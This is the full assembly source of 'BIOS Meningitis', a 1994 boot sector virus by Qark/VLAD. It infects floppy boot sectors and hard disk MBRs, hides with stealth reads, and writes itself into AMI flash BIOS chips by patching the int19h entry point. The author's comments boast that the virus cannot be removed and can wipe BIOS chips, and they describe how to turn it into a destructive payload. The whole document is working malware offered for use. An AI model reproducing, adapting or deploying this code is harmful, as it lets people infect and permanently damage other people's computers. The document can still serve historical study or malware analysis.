;......................................................................... ; ; -=[ BIOS Meningitis ]=- ; Qark/VLAD ; ; ; Basic boot sector virus with a twist. ; ; The worlds first flash BIOS infecting virus! ; ; I _just_ fit all this into 512 bytes. Infact there is only four bytes ; spare... there wasn't even enough room for the name! It used to copy ; the partition table to the end of the virus but that is 64 bytes that ; just couldn't spared, so now you if you boot from a floppy disk, the ; hard disk won't be accessible. But it's a full stealth virus apart ; from that. ; ; If you have flash BIOS on your computer there is a chance it will fuck ; it up! I'm talking wiped BIOS chip type fucked! You WONT be able to ; remove this virus!!! ; ; The results of any tests of this with flash BIOS would be appreciated. ; ; Assemble with A86 as always. ; ;......................................................................... ;On entry to the boot sector DL=Drive booted from. org 0 mov si,7c00h xor ax,ax mov es,ax cli mov ss,ax ;Setup the stack mov sp,si sti mov ds,ax ;DS,CS,ES,SS=0 ;*** 40:[13] - memory in k's - reduce by one or so *** dec word ptr [413h] ;0:413 = Memory in K, Sub one K. int 12h ;Get memory into AX ;Since memory is in K we have to ;multiply by 1024. To do that we ;would SHL AX,10. But because we are ;looking for the segment that takes ;4 bits off the equation. mov cl,6 shl ax,cl ;Thus SHL AX,6 mov es,ax ;ES = Virus Segment ;*** read virus sector into TOM (top of memory) *** xor di,di mov cx,200h cld rep movsb ;Move virus to ES:0 mov ax,word ptr [13h*4] ;Get int13h from vector table. mov word ptr es:[offset i13],ax mov ax,word ptr [13h*4+2] mov word ptr es:[offset i13+2],ax mov word ptr [13h*4],offset handler mov word ptr [13h*4+2],es already_resident: push es mov ax,offset restart push ax retf Restart: ;Load the original bootsector from the end of the root directory and ;execute it. xor ax,ax call int13h xor ax,ax mov es,ax mov bx,7c00h ;Where it's meant to be. mov cx,2 ;Read HD boot strap from MBR. xor dh,dh mov ax,201h ;Read one sector from root directory. cmp dl,80h jae MBR_Loader ;load up floppy mov cl,14 ;Cylinder=0, Sector=14 mov dh,1 ;Head=1 MBR_Loader: call int13h push dx ;DL=Drive we are at. cmp byte ptr cs:flash_done,1 ;flash is already infected. je flash_resident call flash_BIOS ;Infect flash BIOS if any. Flash_resident: pop dx db 0eah ;JMPF 0000:7C00H dw 7c00h dw 0 Stealth: mov cx,2 mov ax,201h cmp dl,80h jae hd_stealth mov cl,14 mov dh,1 hd_stealth: call int13h jmp pop_exit res_test: xchg ah,al iret Handler: cmp ax,0abbah je res_test cmp ah,2 ;Reading the first sector ? jne jend cmp cx,1 jne jend cmp dh,0 jne jend try_infect: call int13h jc jend pushf push ax push bx push cx push dx push si push di push es push ds ;Test if already infected. cmp word ptr es:[bx + offset marker],'LV' je stealth ;Already infected. cmp dl,80h ;C: jb infect_floppy mov cx,2 ;Sector 2 - Empty MBR space. xor dh,dh jmp write_virus Infect_Floppy: ;Store at end of root directory for floppy drives. ;(Will fuck up on 360k but I dont give a shit!) mov cx,14 ;Cylinder=0, Sector=14 mov dh,1 ;Head=1 Write_Virus: ;Write original boot sector to spare room. mov ax,301h call int13h jc pop_exit ;The virus is written at this point. push cs pop es mov byte ptr cs:flash_done,0 xor bx,bx mov ax,301h ;Write virus. mov cx,1 xor dh,dh call int13h Pop_Exit: pop ds pop es pop di pop si pop dx pop cx pop bx pop ax popf retf 2 jend: db 0eah ;Stands for Jmpf i13 dd 0 ;The original int13h Int13h proc near pushf call dword ptr cs:[i13] ret Int13h endp Marker db 'VLAD' ;Running out of room so small ;marker. Flash_BIOS Proc Near ; Flash BIOS infection (c) 1994 Qark/VLAD! ;Disclaimer: If any of this wrecks your computer that's your bad luck ;because you know this is dangerous code. ;I just hope that AMIFLASH is loaded at boot and isn't a driver. Since it's ;written by a BIOS maker you'd think so... mov ax,0e000h ;Get flash BIOS number. int 16h ;Test for its presence. jc no_flash_bios cmp al,0fah ;<-- gotta test this jne no_flash_bios Infect_Flash: ;We are now working with AMIFLASH! ;First we'll find a nice place to store our virus. ; We'll scan between F000-FFFF where BIOS is normally stored for ; a 1K chunk of consecutive zeros. (We might only need half a K ; but I'm overplanning) mov ax,0f000h ;ROM BIOS segment mov ds,ax New_segment: xor si,si xor dx,dx ok_new_segment: inc ax mov ds,ax cmp ax,0fff0h ;No room for our virus. je no_flash_BIOS Test16: cmp word ptr [si],0 ;Scan words jne new_segment inc dx ;DX is our free room counter. cmp dx,512 ;1024 byte buffer found (512x2) je found_storage inc si inc si ;Coz we are messing with words. cmp si,16 ;We are going up in paragraphs. je ok_new_segment jmp test16 Found_storage: sub ax,40h ;Sub 1K (40hx16=1024) mov ds,ax ;Coz we are using segments mov ax,0e001h ;Chipset save requirement. int 16h ;BX=Number of bytes to Save Chipset. cmp bx,512 jbe save_chipset ;We won't bother saving the chipset because it takes up more room ;than our virus buffer can store. Fuck em :) mov byte ptr cs:chipset,1 ;Indicate we haven't saved anything. jmp write_enable No_Flash_BIOS: ret save_chipset: mov byte ptr cs:chipset,0 ;We've saved stuff. mov al,2 push cs pop es ;ES=CS mov di,offset buffer int 16h ;Chipset Status to ES:DI write_enable: mov al,5 int 16h ;Raise Voltage (this may take time). mov al,7 ;Flash Write Enable. int 16h ;Flash Memory is now writable. I am working on nothing here ;so I'll assume you just write to it normally and it'll be ;put there. If you were into writing destructive payloads ;this would be the mother of them all. Just load CX with 0ffffh ;to trash their computer. Also, leaving the computer in this ;state for extended periods could cause damage (Dunno ? Their ;electricity bill would go up at least :) push ds pop es ;DS=ES=Place to put virus. xor di,di mov cx,512 ;<-- FFFF = trouble! push cs pop ds ;DS=CS xor si,si cld rep movsb ;Move our virus into BIOS. ;Hopefully our virus is written ? ;Ok, I looked into this carefully. At bootup int19h points ;into the BIOS but thereafter is grabbed by various programs ;(Dunno why, its the shittiest interrupt out). So, if you debug ;right now it'll point into some shadowed area or else into ;segment 70h, but it won't at bootup which is the only time boot ;sector viruses get executed so all is cool. ;What we'll do is modify the actual bytes at the entry point to ;the interrupt. You might think I should do something else but ;I can't think of any other way of hooking an interrupt at bootup. ;Priest-P/S reckoned I should just store my virus in the Flash ;and let the bootvirus just jump to it or something but then ;it's not really infected methinks. He also suggested I just modify ;the int13h entry point and restore the bytes etc. Well as you can ;see from the involved code needed just to write to flash I think ;that with a common interrupt like int13h it isn't feasible. ;Get Segment:Offset of original int19handler mov bx,es ;BX=Virus Segment xor ax,ax mov ds,ax ;DS=Vector Table. mov di,word ptr [19h*4] ;Offset of int19h mov es,word ptr [19h*4+2] ;Segment of 19h ;Write a JMP FAR at the int19h entry point. mov al,0eah stosb mov ax,offset int19handler stosw mov ax,bx stosw ;Creates a JMPF INT19HANDLER at the ;int19h entry point. mov ax,0e004h ;Lower Voltage. int 16h mov al,6 ;Write Protect. int 16h cmp byte ptr cs:chipset,0 jne No_Flash_BIOS ;We've done for this one. push cs pop es ;ES=CS mov al,3 mov di,offset buffer ;Restore all their shit. int 16h jmp no_flash_bios chipset db 0 ;1=chipset not saved flash_done db 0 ;1=loaded from flash. ;This is our own int19h handler. The original sux because it isn't infected. ;(Strange logic :) Int19Handler Proc Near xor ax,ax mov es,ax ;ES=0 mov ax,0abbah ;ABBA - from Muriels Wedding. int 13h cmp ax,0baabh ;BAAB - I like these. jne real_int19h ;We are currently before the boot here. Lets install our virus before ;any boot sectors or anything get loaded. push cs ;DS=0 pop ds cld xor si,si mov di,7c00h mov cx,512 rep movsb ;Move our virus from BIOS into boot buffer. mov dl,80h ;Make it think its C: jmp goto_Buffer ;Execute it. real_int19h: xor ax,ax int 13h ;Reset disk mov cx,1 mov dh,0 mov ax,201h mov bx,7c00h cmp dl,0 ja hd_int19h int 13h ;Read boot sector. jc fix_hd Goto_Buffer: mov byte ptr es:[7c00h+offset flash_done],1 db 0eah ;JMPF 0000:7C00 dw 7c00h dw 0 Fix_HD: mov dl,80h ;Boot from C: HD_Int19h: xor ax,ax int 13h ;Reset controller. mov ax,201h int 13h jc fucked_boot jmp Goto_Buffer Fucked_boot: int 18h ;Called when a boot fucks up Int19Handler EndP Flash_BIOS EndP End_Virus: DupSize equ 510 - offset End_Virus db DupSize dup (0) db 55h,0aah ;End of Sector Marker. Buffer: ;512 bytes of storage space in here.